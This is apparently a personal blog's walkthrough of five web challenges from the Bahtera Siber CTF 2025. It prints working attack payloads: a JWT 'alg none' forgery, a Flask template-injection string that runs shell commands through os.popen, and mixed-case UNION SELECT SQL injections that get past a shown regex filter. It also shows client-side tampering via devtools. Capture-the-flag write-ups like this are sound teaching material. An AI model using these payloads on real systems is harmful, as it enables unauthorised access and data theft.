Post

Bahtera Siber CTF 2025

Walkthrough of Web Exploitation.

Bahtera Siber CTF 2025

🌐 WEB Exploitation


Given login page for this challenge .

Page Source Code Analysis 🔍

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</style>
</head>
<body class="login-page">
    <div class="container">
    <div class="header">
    <h1>MY MALAYSIAN LEGENDS</h1>
    <p>SuperMokh Portal Access</p>
    </div>
    <div class="login-form">
    <h2>Login Required</h2>

    <form method="POST" action="login.php">
    <div class="input-group">
    <label for="username">Username:</label>
    <input type="text" id="username" name="username" required placeholder="Enter username">
    </div>
    <div class="input-group">
    <label for="password">Password:</label>
    <input type="password" id="password" name="password" required placeholder="Enter password">
    </div>
    <button type="submit"> LOGIN</button>
    </form>
    </div>
</div>
<!-- Z3Vlc3Q6U2VsYW5nb3IxOTcyXzE5ODc=--->

1
Z3Vlc3Q6U2VsYW5nb3IxOTcyXzE5ODc= --> guest:Selangor1972_1987
Decrypting the given base64 will give an username and password fo login page.

can u

💥 Exploit Analysis

Since our roles is a guest we dont have permission to read the flag. Mentioning “Only SuperMokh” can access to flag.


can u

Value of auth_token provided in json web token

can u

Since i dont have any secret key on HS256 algorithm change the alg to none this might be this web are vulnerable to JWT Algorithm Confusion Attack and change the username to SuperMokh.Paste it back in auth_token.

1
Flag: 3108{m0kht4r_d4h4r1_l3g3nd_n3v3r_d13s}

Challenge 2: Pelumba

can u

Identify the tech stack first before going to find vulnerability on a website since every web framework have their vulnerabilities.

1.From this we know that their framework using Flask and Express —-> this tech stack are popular with server side template injection

1
Payload :((7*7))

can u

The server returning the 49 means this website are vulnerable to server side template injection.

1
((config.__class__.__init__.__globals__['os'].popen('ls -a').read()))

List the file and hidden file in a server

can u

in env file there is 3 section part that contaning flag combine all that and get the flag BRRRRRRRRRRRR.

Challenge 3 : Bendera Challenge

can u

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MERDEKA</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <!-- jawapan: Mohamed bin Hamzah -->
    <div class="display-container">
        <div class="top">
            <p id="repeatTextTop">Siapa cipta Jalur Gemilang?</p>
        </div>

        <div class="bottom">
            <p id="repeatTextBottom">Siapa cipta Jalur Gemilang?</p>
        </div>
    </div>

    <div class="container">
        <!-- /config/waf_config.txt -->
        <!-- $q = "SELECT * FROM tokoh WHERE nama='$namaTokoh'"; -->
        <form method="GET">
            <input type="text" name="cari" placeholder="Cari bendera">
            <input type="submit" value="submit" name="submit">
        </form>
    </div>

    <script src="script.js"></script>
</body>
</html>

From this page source we know there is path config/waf_config.txt and also a hint jawapan: Mohamed bin Hamzah

By visiting path /config/waf_config.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
function simple_waf($input) {
    $patterns = [
        '/union/',
        '/select/', 
        '/insert/',
        '/update/',
        '/indices/',
        '/drop/',
        '/--/',
        '/1\/+/',
        '/0%/',
        '/UNION/',
        '/SELECT/',
        '/INSERT/', 
        '/UPDATE/',
        '/DELETE/',
        '/DROP/'
    ];
    
    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $input)) {
            return false;
        }
    }
    return true;
}

We know that this was like waf configuration means we cant direct execute our payload directly .

Mixed case for bypass case-sensitive WAF/Filter

1
2
3
4
 1.use ' UnIoN SeLeCt 1,2,3# =bahtera 
 2.' UnIoN SeLeCt 1,2,table_name FrOm information_schema.tables WhErE table_schema=database()# =tokoh 
 3.' UnIoN SeLeCt 1,2,column_name FrOm information_schema.columns WhErE table_name='tokoh'# =bendera 
 Final Payload : ' UnIoN SeLeCt 1,nama,bendera FrOm tokoh LiMit 1,1# 

can u

1
Flag :3108{d4_jUmP@_b3nD3eR4_K3??}

Challenge 4 : Permainan Lagenda

Given a Web with snake xenzia challenge

💥Exploit Analysis

In page source there was a file game.js in that section of code containing this

can u

From this section of code in game.js shows that we can trigger Flag function was pointing to the Reveal Flag func .

can u

By triggering thye func in dev tools we finally get the flag wkwkwkw.

1
Flag : 3108{u14r_l3gend}

Challenge 5 : Kotak Angkasa

Given a rubric game and solve it to get the flag

can u

🎯 CORE VULNERABILITY:

Server blindly trusts client’s cube state without validation

1
2
3
4
 // Client-side checks
getCurrentCubeState()  // Reads DOM colors
checkSolution()        // Checks if solved
  → If solved: socket.emit("cubeState", solvedData)

✅ Frontend controls cube state reporting

✅ Backend doesn’t verify moves or actual solution

✅ Server trusts whatever cubeState client sends

🚩 EXPLOITATION METHOD:

Step-by-Step Bypass: Don’t solve the cube - Skip the actual puzzle

Forge fake solved state - Create JSON with all uniform colors

send directly via WebSocket:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
// Construct a solved cube state
const solvedCubeState = {
    front: Array(9).fill('blue'),
    back: Array(9).fill('green'), 
    left: Array(9).fill('white'),
    right: Array(9).fill('yellow'),
    top: Array(9).fill('orange'),
    bottom: Array(9).fill('red')
};

// Emit solved state to the server
if (socket) {
    socket.emit('cubeState', solvedCubeState);
}

// Check solution to trigger flag
checkSolution();

Run this code on devtools and get the flag.

can u

This post is licensed under CC BY 4.0 by the author.